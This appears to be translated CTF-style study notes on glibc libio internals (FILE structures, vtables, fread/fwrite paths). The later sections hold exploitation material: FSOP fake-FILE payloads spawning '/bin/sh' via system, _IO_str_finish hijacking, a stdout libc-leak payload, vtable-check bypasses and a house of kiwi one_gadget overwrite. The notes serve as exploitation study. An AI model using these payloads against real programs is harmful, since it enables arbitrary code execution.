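Writing to a file: the program first copies data from source into the buffer. _IO_write_ptr marks how far data from source has been written, i.e. _IO_write_ptr to _IO_write_end is the remaining space. When _IO_write_ptr == _IO_buf_end, everything is written to fd.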

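IO data operations

1. Reading data from disk

  1. Read a batch (one block) of data from fd into the input buffer (_IO_buf_base to _IO_buf_end) and set the initial values of _IO_read_base, _IO_read_ptr and _IO_read_end. (_IO_read_ptr == _IO_read_base, although they may also differ)
  2. Copy data from _IO_read_ptr to the memory that needs it, advancing _IO_read_ptr accordingly.
  3. When _IO_read_ptr == _IO_read_end, the buffer holds no more usable data and data must be read from the file again. Go back to step 1.

2. Writing data to disk

  1. First copy the data from source into the output buffer; _IO_write_ptr points to the position written so far.
  2. When _IO_write_ptr == _IO_buf_end, write the whole buffer to fd, set _IO_write_ptr to _IO_write_base, and repeat step 1.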
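
The write path described in the two steps above can be illustrated with a toy model. This is not how libio is implemented; OutputBuffer is a hypothetical class in which a Python list stands in for the file descriptor and an integer offset stands in for _IO_write_ptr.

```python
class OutputBuffer:
    """Toy output buffer: data is only passed on when the buffer is full."""

    def __init__(self, size: int, sink: list):
        self.buf = bytearray(size)   # _IO_buf_base .. _IO_buf_end
        self.write_ptr = 0           # offset of _IO_write_ptr from _IO_write_base
        self.sink = sink             # stands in for the file descriptor

    def write(self, data: bytes) -> None:
        for byte in data:
            self.buf[self.write_ptr] = byte
            self.write_ptr += 1
            if self.write_ptr == len(self.buf):   # _IO_write_ptr == _IO_buf_end
                self.flush()

    def flush(self) -> None:
        if self.write_ptr:
            self.sink.append(bytes(self.buf[:self.write_ptr]))
        self.write_ptr = 0           # _IO_write_ptr = _IO_write_base

sink = []
out = OutputBuffer(4, sink)
out.write(b"abcdef")                 # "abcd" is flushed, "ef" stays buffered
buffered_before_flush = list(sink)
out.flush()
```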

3. Allocating the buffer

Allocate a buffer, setting _IO_buf_base to its start and _IO_buf_end to its end.

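_IO_file_jumps functions

1._IO_new_file_finish

This is the operation performed when a file is finished, so it does the following:

  1. Flush all buffers
  2. Close the file (close)

2._IO_new_file_overflow

Mainly handles writing data to disk when the output buffer is used up

The function is quite complex internally and includes some checks; for example, if the buffer does not exist it is initialized first. The function also takes a flag-like parameter ch:

  1. If ch == EOF, output the range f->_IO_write_ptr - f->_IO_write_base.
  2. If ch != EOF and f->_IO_write_ptr == f->_IO_buf_end, output the whole buffer.
  3. If ch == '\n', output f->_IO_write_ptr - f->_IO_write_base plus a newline.
  4. If none of the above applies, return ch

3._IO_new_file_underflow

This function is similar to _IO_new_file_overflow and is mainly used to read data from disk; each read covers _IO_buf_base to _IO_buf_end

In case the disk holds less data than that, _IO_read_end is set according to the number of bytes actually read. If the buffer does not exist, it is initialized first. The function returns the byte at _IO_read_ptr.

4.__GI__IO_default_uflow(_IO_default_uflow)

This function calls _IO_new_file_underflow and performs a few simple checks.

5.__GI__IO_default_pbackfail(_IO_default_pbackfail)

A function that sets up storage (putback); not important for now.

6._IO_new_file_xsputn

The main purpose of this function is to copy data from source into the output buffer. Several cases arise while doing so:

  1. If the data to write is smaller than the remaining space (_IO_buf_end - _IO_write_ptr), it is simply copied into the output buffer.
  2. If the data to write is larger than the remaining space (_IO_buf_end - _IO_write_ptr):
    1. Fill the output buffer first, then call _IO_new_file_overflow to flush it.
    2. Call _IO_new_file_xsputn again for the remaining data

Note: the everyday output functions mainly call this function.

7.__GI__IO_file_xsgetn(_IO_file_xsgetn)

The main purpose of this function is to copy data from the input buffer into target. Several cases arise while doing so:

  1. If the data to read is smaller than the remaining data (_IO_read_end - _IO_read_ptr), it is simply copied to target.
  2. If the data to read is larger than the remaining data (_IO_read_end - _IO_read_ptr):
    1. Drain the input buffer first, then call _IO_new_file_underflow to read one block from disk.
    2. If a very large amount of data is needed, call __GI__IO_file_read to read directly from disk.

Note: the everyday input functions mainly call this function.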

8._IO_new_file_seekoff

The offset-setting function; it sets the ptr pointers discussed above.

9._IO_default_seekpos

Simply calls _IO_new_file_seekoff

10._IO_new_file_setbuf

This function is fairly simple; as the name says, it sets up the buffer by initializing each buffer area:

  1. _IO_write_base = _IO_write_ptr = _IO_write_end = _IO_buf_base
  2. _IO_read_base = _IO_read_ptr = _IO_read_end = _IO_buf_base (using the _IO_setg macro)

11._IO_new_file_sync

The sync function; keeps the disk and the buffer in sync.

12.__GI__IO_file_doallocate(_IO_default_doallocate)

This is the function that allocates the buffer; after allocating, it also initializes the input and output buffers.

13.__GI__IO_file_read(_IO_file_read)

The final input function; a thin wrapper around syscall_read.

14._IO_new_file_write

The final output function; a thin wrapper around syscall_write.

15.__GI__IO_file_seek(_IO_file_seek)

Calls __lseek64

16.__GI__IO_file_close(_IO_file_close)

As the name says, closes the file.

17.__GI__IO_file_stat(_IO_file_stat)

Gets the status of the file descriptor. Calls __fxstat64

18._IO_default_showmanyc

Unused; returns -1.

19._IO_default_imbue

Unused.

20. Miscellaneous

flag bits

#define _IO_MAGIC 0xFBAD0000 /* Magic number */
#define _OLD_STDIO_MAGIC 0xFABC0000 /* Emulate old stdio. */
#define _IO_MAGIC_MASK 0xFFFF0000
#define _IO_USER_BUF 1 /* User owns buffer; don't delete it on close. */
#define _IO_UNBUFFERED 2
#define _IO_NO_READS 4 /* Reading not allowed */
#define _IO_NO_WRITES 8 /* Writing not allowd */
#define _IO_EOF_SEEN 0x10
#define _IO_ERR_SEEN 0x20
#define _IO_DELETE_DONT_CLOSE 0x40 /* Don't call close(_fileno) on cleanup. */
#define _IO_LINKED 0x80 /* Set if linked (using _chain) to streambuf::_list_all.*/
#define _IO_IN_BACKUP 0x100
#define _IO_LINE_BUF 0x200
#define _IO_TIED_PUT_GET 0x400 /* Set if put and get pointer logicly tied. */
#define _IO_CURRENTLY_PUTTING 0x800
#define _IO_IS_APPENDING 0x1000
#define _IO_IS_FILEBUF 0x2000
#define _IO_BAD_SEEN 0x4000
#define _IO_USER_LOCK 0x8000
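
A small decoder makes _flags values such as 0xfbad1800 or 0xfbad2488 easier to read. The bit values are copied from the defines above; decode_flags is a hypothetical helper name.

```python
IO_FLAGS = {
    0x0001: "_IO_USER_BUF",
    0x0002: "_IO_UNBUFFERED",
    0x0004: "_IO_NO_READS",
    0x0008: "_IO_NO_WRITES",
    0x0010: "_IO_EOF_SEEN",
    0x0020: "_IO_ERR_SEEN",
    0x0040: "_IO_DELETE_DONT_CLOSE",
    0x0080: "_IO_LINKED",
    0x0100: "_IO_IN_BACKUP",
    0x0200: "_IO_LINE_BUF",
    0x0400: "_IO_TIED_PUT_GET",
    0x0800: "_IO_CURRENTLY_PUTTING",
    0x1000: "_IO_IS_APPENDING",
    0x2000: "_IO_IS_FILEBUF",
    0x4000: "_IO_BAD_SEEN",
    0x8000: "_IO_USER_LOCK",
}

def decode_flags(flags: int):
    """Return (magic is valid, names of the flag bits that are set)."""
    magic_ok = (flags & 0xFFFF0000) == 0xFBAD0000
    names = [name for bit, name in IO_FLAGS.items() if flags & bit]
    return magic_ok, names

leak_flags = decode_flags(0xFBAD1800)
file_flags = decode_flags(0xFBAD2488)
```

The value 0xfbad1800 used for stdout leaks therefore means _IO_CURRENTLY_PUTTING plus _IO_IS_APPENDING on top of the magic number.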

flush (_IO_do_flush)

Flushes the buffer, emptying the output buffer.

Flush-all function (fflush)

# define fflush(s) _IO_fflush (s)  //  /assert/assert.c
// /libio/iofflush.c
int _IO_fflush (FILE *fp)
{
  if (fp == NULL)
    return _IO_flush_all ();
  else
    {
      int result;
      CHECK_FILE (fp, EOF);
      _IO_acquire_lock (fp);
      result = _IO_SYNC (fp) ? EOF :0;
      _IO_release_lock (fp);
      return result;
    }
}
libc_hidden_def (_IO_fflush)

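As shown, when its argument is NULL, fflush flushes all files (_IO_flush_all_lockp => _IO_OVERFLOW); otherwise it syncs the specified file. The two cases follow different paths.

Buffer-setup macros

_IO_setg, _IO_setp, and so on

vtable check

The vtable check was added in 2.24: IO_validate_vtable calls _IO_vtable_check when the vtable lies outside the allowed range. Many of the houses people have found do not attack the file jump table but other jump tables, though they are all broadly similar. A brief summary:

  1. 2.23 has no restriction at all: the vtable can be hijacked onto the heap and its contents modified, then FSOP is triggered,
  2. 2.24 introduced the vtable check, which makes hijacking the whole vtable onto the heap impossible; it was then found that the internal vtables _IO_str_jumps and _IO_wstr_jumps can be used for exploitation.
  3. Since 2.28, _IO_str_finish calls free directly, so the approach above no longer works, which gave rise to other call chains.

vtable range

The vtable location is validated mainly in IO_validate_vtable. Before 2.37 the accepted interval is the region between _IO_helper_jumps and _IO_str_jumps, 0xd60 bytes, which contains the following vtables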

_IO_helper_jumps
_IO_helper_jumps
_IO_cookie_jumps
_IO_proc_jumps
_IO_str_chk_jumps
_IO_wstrn_jumps
_IO_wstr_jumps
_IO_wfile_jumps_maybe_mmap
_IO_wfile_jumps_mmap
__GI__IO_wfile_jumps
_IO_wmem_jumps
_IO_mem_jumps
_IO_strn_jumps
_IO_obstack_jumps
_IO_file_jumps_maybe_mmap
_IO_file_jumps_mmap
__GI__IO_file_jumps
_IO_str_jumps

Attacking _IO_vtable_check

When IO_validate_vtable finds the vtable outside the allowed range, execution enters _IO_vtable_check,

void attribute_hidden _IO_vtable_check (void)
{
#ifdef SHARED
  /* Honor the compatibility flag.  */
  void (*flag) (void) = atomic_load_relaxed (&IO_accept_foreign_vtables);
#ifdef PTR_DEMANGLE
  PTR_DEMANGLE (flag);
#endif
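  if (flag == &_IO_vtable_check) // check whether foreign (externally rebuilt) vtables are accepted
    return;

Certain conditions just have to hold, so the vtable check can still be bypassed:

  1. Leak ptr_guard, compute the matching IO_accept_foreign_vtables value, and overwrite it.
  2. Since IO_accept_foreign_vtables is essentially 0, directly changing ptr_guard to &_IO_vtable_check also works.

Either way, the ld file is required

Foreign vtables

check_stdfiles_vtables is the function that enables foreign vtables; if this function can be made to run, the vtable check is bypassed as well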

static void  check_stdfiles_vtables (void)
{
  if (_IO_2_1_stdin_.vtable != &_IO_file_jumps
      || _IO_2_1_stdout_.vtable != &_IO_file_jumps
      || _IO_2_1_stderr_.vtable != &_IO_file_jumps)
    IO_set_accept_foreign_vtables (&_IO_vtable_check);
}

IO_FILE structure

_IO_FILE_plus

0x0   _flags
0x8 _IO_read_ptr
0x10 _IO_read_end
0x18 _IO_read_base
0x20 _IO_write_base
0x28 _IO_write_ptr
0x30 _IO_write_end
0x38 _IO_buf_base
0x40 _IO_buf_end
0x48 _IO_save_base
0x50 _IO_backup_base
0x58 _IO_save_end
0x60 _markers
0x68 _chain
0x70 _fileno
0x74 _flags2
0x78 _old_offset
0x80 _cur_column
0x82 _vtable_offset
0x83 _shortbuf
0x88 _lock
0x90 _offset
0x98 _codecvt
0xa0 _wide_data
0xa8 _freeres_list
0xb0 _freeres_buf
0xb8 __pad5
0xc0 _mode
0xc4 _unused2
0xd8 vtable

_IO_wide_data

/* Extra data for wide character streams.  */
struct _IO_wide_data
{
wchar_t *_IO_read_ptr; /* Current read pointer */
wchar_t *_IO_read_end; /* End of get area. */
wchar_t *_IO_read_base; /* Start of putback+get area. */
wchar_t *_IO_write_base; /* Start of put area. */
wchar_t *_IO_write_ptr; /* Current put pointer. */
wchar_t *_IO_write_end; /* End of put area. */
wchar_t *_IO_buf_base; /* Start of reserve area. */
wchar_t *_IO_buf_end; /* End of reserve area. */
/* The following fields are used to support backing up and undo. */
wchar_t *_IO_save_base; /* Pointer to start of non-current get area. */
wchar_t *_IO_backup_base; /* Pointer to first valid character of
backup area */
wchar_t *_IO_save_end; /* Pointer to end of non-current get area. */

__mbstate_t _IO_state;
__mbstate_t _IO_last_state;
struct _IO_codecvt _codecvt;

wchar_t _shortbuf[1];

const struct _IO_jump_t *_wide_vtable;
};

_IO_wstrn_jumps

const struct _IO_jump_t _IO_wstrn_jumps attribute_hidden =
{
JUMP_INIT_DUMMY,
JUMP_INIT_DUMMY2,
JUMP_INIT(finish, _IO_wstr_finish),
JUMP_INIT(overflow, (_IO_overflow_t) _IO_wstrn_overflow),
JUMP_INIT(underflow, (_IO_underflow_t) _IO_wstr_underflow),
JUMP_INIT(uflow, (_IO_underflow_t) _IO_wdefault_uflow),
JUMP_INIT(pbackfail, (_IO_pbackfail_t) _IO_wstr_pbackfail),
JUMP_INIT(xsputn, _IO_wdefault_xsputn),
JUMP_INIT(xsgetn, _IO_wdefault_xsgetn),
JUMP_INIT(seekoff, _IO_wstr_seekoff),
JUMP_INIT(seekpos, _IO_default_seekpos),
JUMP_INIT(setbuf, _IO_default_setbuf),
JUMP_INIT(sync, _IO_default_sync),
JUMP_INIT(doallocate, _IO_wdefault_doallocate),
JUMP_INIT(read, _IO_default_read),
JUMP_INIT(write, _IO_default_write),
JUMP_INIT(seek, _IO_default_seek),
JUMP_INIT(close, _IO_default_close),
JUMP_INIT(stat, _IO_default_stat),
JUMP_INIT(showmanyc, _IO_default_showmanyc),
JUMP_INIT(imbue, _IO_default_imbue)
};

_IO_obstack_jumps

/* the jump table.  */
const struct _IO_jump_t _IO_obstack_jumps libio_vtable attribute_hidden =
{
JUMP_INIT_DUMMY,
JUMP_INIT(finish, NULL),
JUMP_INIT(overflow, _IO_obstack_overflow),
JUMP_INIT(underflow, NULL),
JUMP_INIT(uflow, NULL),
JUMP_INIT(pbackfail, NULL),
JUMP_INIT(xsputn, _IO_obstack_xsputn),
JUMP_INIT(xsgetn, NULL),
JUMP_INIT(seekoff, NULL),
JUMP_INIT(seekpos, NULL),
JUMP_INIT(setbuf, NULL),
JUMP_INIT(sync, NULL),
JUMP_INIT(doallocate, NULL),
JUMP_INIT(read, NULL),
JUMP_INIT(write, NULL),
JUMP_INIT(seek, NULL),
JUMP_INIT(close, NULL),
JUMP_INIT(stat, NULL),
JUMP_INIT(showmanyc, NULL),
JUMP_INIT(imbue, NULL)
};

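How the IO_FILE structure is used

Initialization

Initially the following _IO_FILE structures exist:

  • _IO_2_1_stderr_
  • _IO_2_1_stdout_
  • _IO_2_1_stdin_

These three structures are linked through _IO_list_all, with _chain pointing to the next structure:

  • _IO_list_all->_IO_2_1_stderr_->_IO_2_1_stdout_->_IO_2_1_stdin_

There are also 3 global pointers:

  • stdin points to _IO_2_1_stdin_
  • stdout points to _IO_2_1_stdout_
  • stderr points to _IO_2_1_stderr_

There is also a function-pointer structure, vtable, which holds pointers to the various IO functions

[[./_IO_list_all1.png]]

fopen

  • fopen
  • _IO_new_fopen
  • __fopen_internal
  • malloc creates the locked_FILE structure
  • _IO_no_init null-initializes the structure
  • _IO_file_init links the structure into _IO_list_all
  • _IO_file_open performs the system call that opens the file

fread

  • fread
  • _IO_sgetn
  • _IO_file_xsgetn
  • If the buffer has not been initialized, call _IO_doallocbuf->_IO_file_doallocate to initialize the IO buffer; this allocates a heap chunk and only initializes _IO_buf_base and _IO_buf_end
  • If the buffer holds data not yet copied to buf, copy as much as possible into buf without exceeding the amount requested
  • If the buffer length is smaller than the amount requested, reset the buffer's read/write pointers
  • __underflow calls _IO_SYSREAD to read data into the buffer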
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x555555559000
Size: 0x290 (with flag bits: 0x291)

Allocated chunk | PREV_INUSE
Addr: 0x555555559290
Size: 0x1e0 (with flag bits: 0x1e1)

Allocated chunk | PREV_INUSE
Addr: 0x555555559470
Size: 0x1010 (with flag bits: 0x1011)

Top chunk | PREV_INUSE
Addr: 0x55555555a480
Size: 0x1fb80 (with flag bits: 0x1fb81)

pwndbg> p *(struct _IO_FILE_plus*) 0x5555555592a0
$2 = {
file = {
_flags = -72539000,
_IO_read_ptr = 0x0,
_IO_read_end = 0x0,
_IO_read_base = 0x0,
_IO_write_base = 0x0,
_IO_write_ptr = 0x0,
_IO_write_end = 0x0,
_IO_buf_base = 0x555555559480 "",
_IO_buf_end = 0x55555555a480 "",
_IO_save_base = 0x0,
_IO_backup_base = 0x0,
_IO_save_end = 0x0,
_markers = 0x0,
_chain = 0x7ffff7e044e0 <_IO_2_1_stderr_>,
_fileno = 3,
_flags2 = 0,
_old_offset = 0,
_cur_column = 0,
_vtable_offset = 0 '\000',
_shortbuf = "",
_lock = 0x555555559380,
_offset = -1,
_codecvt = 0x0,
_wide_data = 0x555555559390,
_freeres_list = 0x0,
_freeres_buf = 0x0,
__pad5 = 0,
_mode = 0,
_unused2 = '\000' <repeats 19 times>
},
vtable = 0x7ffff7e02030 <_IO_file_jumps>
}
pwndbg> tele 0x5555555592a0
00:0000│ rbx 0x5555555592a0 ◂— 0xfbad2488
01:0008│ 0x5555555592a8 ◂— 0
... ↓ 5 skipped
07:0038│ 0x5555555592d8 —▸ 0x555555559480 ◂— 0
pwndbg>
08:0040│ 0x5555555592e0 —▸ 0x55555555a480 ◂— 0
09:0048│ 0x5555555592e8 ◂— 0
... ↓ 3 skipped
0d:0068│ 0x555555559308 —▸ 0x7ffff7e044e0 (_IO_2_1_stderr_) ◂— 0xfbad2086
0e:0070│ 0x555555559310 ◂— 3
0f:0078│ 0x555555559318 ◂— 0
pwndbg>
10:0080│ 0x555555559320 ◂— 0
11:0088│ 0x555555559328 —▸ 0x555555559380 ◂— 1
12:0090│ 0x555555559330 ◂— 0xffffffffffffffff
13:0098│ 0x555555559338 ◂— 0
14:00a0│ 0x555555559340 —▸ 0x555555559390 ◂— 0
15:00a8│ 0x555555559348 ◂— 0
... ↓ 2 skipped
pwndbg>
18:00c0│ 0x555555559360 ◂— 0
... ↓ 2 skipped
1b:00d8│ 0x555555559378 —▸ 0x7ffff7e02030 (_IO_file_jumps) ◂— 0
1c:00e0│ 0x555555559380 ◂— 1
1d:00e8│ 0x555555559388 —▸ 0x7ffff7fb2740 ◂— 0x7ffff7fb2740
1e:00f0│ 0x555555559390 ◂— 0
1f:00f8│ 0x555555559398 ◂— 0
pwndbg>
20:0100│ 0x5555555593a0 ◂— 0
... ↓ 7 skipped
pwndbg>
28:0140│ 0x5555555593e0 ◂— 0
... ↓ 7 skipped
pwndbg>
30:0180│ 0x555555559420 ◂— 0
... ↓ 7 skipped
pwndbg>
38:01c0│ 0x555555559460 ◂— 0
39:01c8│ 0x555555559468 ◂— 0
3a:01d0│ 0x555555559470 —▸ 0x7ffff7e02228 (_IO_wfile_jumps) ◂— 0
3b:01d8│ 0x555555559478 ◂— 0x1011
3c:01e0│ rsi 0x555555559480 ◂— 0
... ↓ 3 skipped
pwndbg> tele 0x555555559470
00:0000│ 0x555555559470 —▸ 0x7ffff7e02228 (_IO_wfile_jumps) ◂— 0
01:0008│ 0x555555559478 ◂— 0x1011
02:0010│ rax rsi 0x555555559480 ◂— 'your_flag_content\n'
03:0018│ 0x555555559488 ◂— 'g_content\n'
04:0020│ 0x555555559490 ◂— 0xa74 /* 't\n' */
05:0028│ 0x555555559498 ◂— 0
... ↓ 2 skipped

[[./fread1.png]]

fwrite

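  • fwrite
  • _IO_fwrite
  • _IO_file_xsputn
  • If the buffer has free space, copy as much of the pending output as fits into the free space
  • If some data could not be copied into the buffer, call _IO_new_file_overflow to output and empty the output buffer
  • new_do_write outputs the data in buf directly
  • If data still remains, call _IO_default_xsputn to copy it into the output buffer; memcpy is used when the remaining length exceeds 20 bytes, otherwise the bytes are assigned directly

[[./fwrite1.png]]

fclose

  • fclose
  • _IO_new_fclose
  • _IO_un_link
  • _IO_file_close_it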

vtable

fopen

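fopen only allocates space and builds the FILE structure; it does not call any function in the vtable

fread

  • _IO_sgetn calls _IO_file_xsgetn
  • _IO_doallocbuf calls _IO_file_doallocate to initialize the input buffer
  • _IO_file_doallocate calls __GI__IO_file_stat to get file information
  • __underflow calls _IO_new_file_underflow to read the file data
  • _IO_new_file_underflow calls __GI__IO_file_read from the vtable, which finally performs the read system call

fwrite

  • _IO_fwrite calls _IO_new_file_xsputn
  • _IO_new_file_xsputn calls _IO_new_file_overflow to set up and flush the buffer
  • _IO_new_file_overflow calls _IO_file_doallocate to initialize the buffer
  • _IO_file_doallocate calls __GI__IO_file_stat from the vtable to get file information
  • _IO_SYSWRITE in new_do_write calls _IO_new_file_write from the vtable, which finally performs the write system call

fclose

  • _IO_do_write, which flushes the buffer, calls functions in the vtable
  • Closing the file descriptor: _IO_SYSCLOSE calls the __close function in the vtable
  • _IO_FINISH calls __finish in the vtable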

FSOP

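  • Core idea: hijack _IO_list_all so that it points to a forged _IO_FILE_plus, then get the program to run _IO_flush_all_lockp. This function flushes the file stream of every entry on the _IO_list_all list, which amounts to calling fflush on each FILE and therefore calls _IO_overflow in _IO_FILE_plus.vtable
  • Prerequisites:
    • The program runs _IO_flush_all_lockp in three situations:
      • when libc runs its abort path (no longer flushes after 2.27)
      • when exit is called (only stderr is flushed; no longer flushes after 2.36)
      • when execution returns from main
    • Bypass the checks

Backtrace for abort: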

_IO_flush_all_lockp (do_lock=do_lock@entry=0x0)
__GI_abort ()
__libc_message (do_abort=do_abort@entry=0x2, fmt=fmt@entry=0x7ffff7ba0d58 "*** Error in `%s': %s: 0x%s ***\n")
malloc_printerr (action=0x3, str=0x7ffff7ba0e90 "double free or corruption (top)", ptr=<optimized out>, ar_ptr=<optimized out>)
_int_free (av=0x7ffff7dd4b20 <main_arena>, p=<optimized out>,have_lock=0x0)
main ()
__libc_start_main (main=0x400566 <main>, argc=0x1, argv=0x7fffffffe578, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe568)
_start ()

Backtrace for the exit function:

_IO_flush_all_lockp (do_lock=do_lock@entry=0x0)
_IO_cleanup ()
__run_exit_handlers (status=0x0, listp=<optimized out>, run_list_atexit=run_list_atexit@entry=0x1)
__GI_exit (status=<optimized out>)
main ()
__libc_start_main (main=0x400566 <main>, argc=0x1, argv=0x7fffffffe578, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe568)
_start ()

Backtrace for normal program exit:

_IO_flush_all_lockp (do_lock=do_lock@entry=0x0)
_IO_cleanup ()
__run_exit_handlers (status=0x0, listp=<optimized out>, run_list_atexit=run_list_atexit@entry=0x1)
__GI_exit (status=<optimized out>)
__libc_start_main (main=0x400526 <main>, argc=0x1, argv=0x7fffffffe578, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe568)
_start ()

if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)) && _IO_OVERFLOW(fp, EOF) == EOF) {
result = EOF;
}
fake_file = b""
fake_file += b"/bin/sh\x00" # _flags, an magic number
fake_file += p64(0) # _IO_read_ptr
fake_file += p64(0) # _IO_read_end
fake_file += p64(0) # _IO_read_base
fake_file += p64(0) # _IO_write_base
fake_file += p64(libc.sym['system']) # _IO_write_ptr
fake_file += p64(0) # _IO_write_end
fake_file += p64(0) # _IO_buf_base;
fake_file += p64(0) # _IO_buf_end should usually be (_IO_buf_base + 1)
fake_file += p64(0) * 4 # from _IO_save_base to _markers
fake_file += p64(libc.sym['_IO_2_1_stdout_']) # the FILE chain ptr
fake_file += p32(2) # _fileno for stderr is 2
fake_file += p32(0) # _flags2, usually 0
fake_file += p64(0xFFFFFFFFFFFFFFFF) # _old_offset, -1
fake_file += p16(0) # _cur_column
fake_file += b"\x00" # _vtable_offset
fake_file += b"\n" # _shortbuf[1]
fake_file += p32(0) # padding
fake_file += p64(libc.sym['_IO_2_1_stdout_'] + 0x1ea0) # _IO_stdfile_1_lock
fake_file += p64(0xFFFFFFFFFFFFFFFF) # _offset, -1
fake_file += p64(0) # _codecvt, usually 0
fake_file += p64(libc.sym['_IO_2_1_stdout_'] - 0x160) # _IO_wide_data_1
fake_file += p64(0) * 3 # from _freeres_list to __pad5
fake_file += p32(0xFFFFFFFF) # _mode, usually -1
fake_file += b"\x00" * 19 # _unused2
fake_file = fake_file.ljust(0xD8, b'\x00') # adjust to vtable
fake_file += p64(libc.sym['_IO_2_1_stderr_'] + 0x10) # fake vtable

Buffer exploitation (incomplete)

stdin

Arbitrary address write

stdout

Arbitrary address write

Arbitrary address read

__IO_str_jumps(under 2.27)

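  • Put _IO_str_jumps or _IO_wstr_jumps into vtable to pass the IO_validate_vtable check

  • Locating _IO_str_jumps

    • _IO_str_jumps is not an exported symbol, so libc.sym["_IO_str_jumps"] finds nothing; an exported function referenced by _IO_str_jumps, such as _IO_str_underflow, can be used to locate it
    • First get the address of _IO_str_underflow, then find every pointer that points to it
    • _IO_str_underflow sits at offset 0x20 inside _IO_str_jumps, and the address of _IO_str_jumps is higher than that of _IO_file_jumps, so the lowest address satisfying both conditions is taken as the address of _IO_str_jumps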
      from bisect import *

      IO_file_jumps = libc.symbols['_IO_file_jumps']
      IO_str_underflow = libc.symbols['_IO_str_underflow']
      IO_str_underflow_ptr = list(libc.search(p64(IO_str_underflow)))
      IO_str_jumps = IO_str_underflow_ptr[bisect_left(IO_str_underflow_ptr, IO_file_jumps + 0x20)] - 0x20
      print(hex(IO_str_jumps))
  • Hijacking _IO_str_finish

    void
    _IO_str_finish (_IO_FILE *fp, int dummy)
    {
    if (fp->_IO_buf_base && !(fp->_flags & _IO_USER_BUF))
    (((_IO_strfile *) fp)->_s._free_buffer) (fp->_IO_buf_base);
    fp->_IO_buf_base = NULL;

    _IO_default_finish (fp, 0);
    }

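  • Pointing the vtable pointer at &_IO_str_jumps - 8 makes the _IO_OVERFLOW slot (vtable + 0x18) resolve to _IO_str_finish (stored at _IO_str_jumps + 0x10)

  • fp->_IO_buf_base must be non-NULL; it is passed as the first argument to fp->_s._free_buffer, so the address of /bin/sh can go here

  • fp->_flags must not contain _IO_USER_BUF, defined as #define _IO_USER_BUF 1, i.e. the lowest bit of fp->_flags is 0

  • _IO_write_base < _IO_write_ptr and _mode <= 0

  • Set ((_IO_strfile *) fp)->_s._free_buffer to the address of system, i.e. write the address of system at fp+0xE8

  • Trigger _IO_flush_all_lockp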
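
The checklist above can be sketched as a small builder. This is a minimal illustration, not a drop-in exploit: it assumes the usual x86-64 FILE layout (`_IO_buf_base` at 0x38, `_mode` at 0xC0, `vtable` at 0xD8), and the function name and its three address parameters are hypothetical values that would come from a prior leak.

```python
import struct


def build_str_finish_file(io_str_jumps, system_addr, binsh_addr):
    """Lay out a fake FILE that satisfies the _IO_str_finish conditions."""
    fake = bytearray(0xF0)

    def put64(offset, value):
        struct.pack_into("<Q", fake, offset, value)

    put64(0x00, 0)                 # _flags: bit 0 (_IO_USER_BUF) is clear
    put64(0x20, 0)                 # _IO_write_base
    put64(0x28, 1)                 # _IO_write_ptr > _IO_write_base
    put64(0x38, binsh_addr)        # _IO_buf_base: argument passed to _free_buffer
    struct.pack_into("<i", fake, 0xC0, 0)  # _mode <= 0
    put64(0xD8, io_str_jumps - 8)  # vtable: overflow slot now lands on _IO_str_finish
    put64(0xE8, system_addr)       # _s._free_buffer
    return bytes(fake)


# Example addresses are placeholders, not real libc offsets.
fake_file = build_str_finish_file(0x7FFFF7DD0000, 0x7FFFF7A52390, 0x7FFFF7B99D57)
```

The buffer is built by offset rather than by appending fields so that each write can be compared directly with the bullet it implements.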

Combining with heap exploitation

leak libc

libc-2.23

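  • Use a fastbin attack to allocate a fastbin chunk at _IO_2_1_stdout_-0x43
  • Overwrite the lowest byte of the _IO_write_base pointer so that it points at the _chain field, which stores the address of the _IO_2_1_stdin_ structure; the next time the program outputs anything, it first writes out the contents of the write buffer, which leaks that libc address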
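
A sketch of the payload written into that fake chunk, under stated assumptions: the chunk header sits at `_IO_2_1_stdout_ - 0x43`, so user data starts 0x33 bytes before the structure; the `_flags` value 0xFBAD1800 (`_IO_MAGIC | _IO_CURRENTLY_PUTTING | _IO_IS_APPENDING`) is the value commonly used for this leak and is not taken from these notes; `write_base_low_byte` is a hypothetical parameter that depends on the target libc.

```python
import struct

FAKE_CHUNK_DELTA = 0x43   # chunk header at _IO_2_1_stdout_ - 0x43 (from the notes)
CHUNK_HEADER_SIZE = 0x10  # prev_size + size on 64-bit
LEAK_FLAGS = 0xFBAD1800   # assumption: magic | CURRENTLY_PUTTING | IS_APPENDING


def build_stdout_leak_payload(write_base_low_byte):
    """Padding up to stdout, new _flags, zeroed read pointers, one-byte overwrite."""
    padding = b"\x00" * (FAKE_CHUNK_DELTA - CHUNK_HEADER_SIZE)
    payload = padding
    payload += struct.pack("<Q", LEAK_FLAGS)   # _flags
    payload += struct.pack("<Q", 0) * 3        # _IO_read_ptr, _IO_read_end, _IO_read_base
    payload += bytes([write_base_low_byte])    # lowest byte of _IO_write_base
    return payload


payload = build_stdout_leak_payload(0x88)  # 0x88 is only a placeholder byte
```

Only one byte of `_IO_write_base` is written, so the upper bytes keep their original libc value and no prior leak is needed.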

vtable

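  • Use a fastbin attack to allocate a 0x60-sized chunk at _IO_2_1_stdout_+157
  • Point the vtable pointer at a vtable forged in advance (*(vtable+0x10)=system_addr). IO functions pass the _IO_2_1_stdout_ structure pointer as the argument to the vtable function, so ;sh; can be written into the 4 bytes of padding after the flag field of _IO_2_1_stdout_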

house of orange

See attack

house of husk

See attack

house of kiwi(under 2.36)

  • Reaches a vtable call even when the program never calls exit

sysmalloc

assert ((old_top == initial_top (av) && old_size == 0) ||
((unsigned long) (old_size) >= MINSIZE &&
prev_inuse (old_top) &&
((unsigned long) old_end & (pagesize - 1)) == 0));
__malloc_assert
static void
__malloc_assert (const char *assertion, const char *file, unsigned int line,
const char *function)
{
(void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
__progname, __progname[0] ? ": " : "",
file, line,
function ? function : "", function ? ": " : "",
assertion);
fflush (stderr);
abort ();
}
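This relies on _IO_fflush inside fflush, which executes call [rbp + 0x60]. rbp points to _IO_file_jumps, so the function called is _IO_new_file_sync. _IO_file_jumps is writable, so overwriting the _IO_new_file_sync slot in _IO_file_jumps with a one_gadget is enough to get a shell.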

setcontext+61
.text:0000000000050C0D mov     rsp, [rdx+0A0h]
.text:0000000000050C14 mov rbx, [rdx+80h]
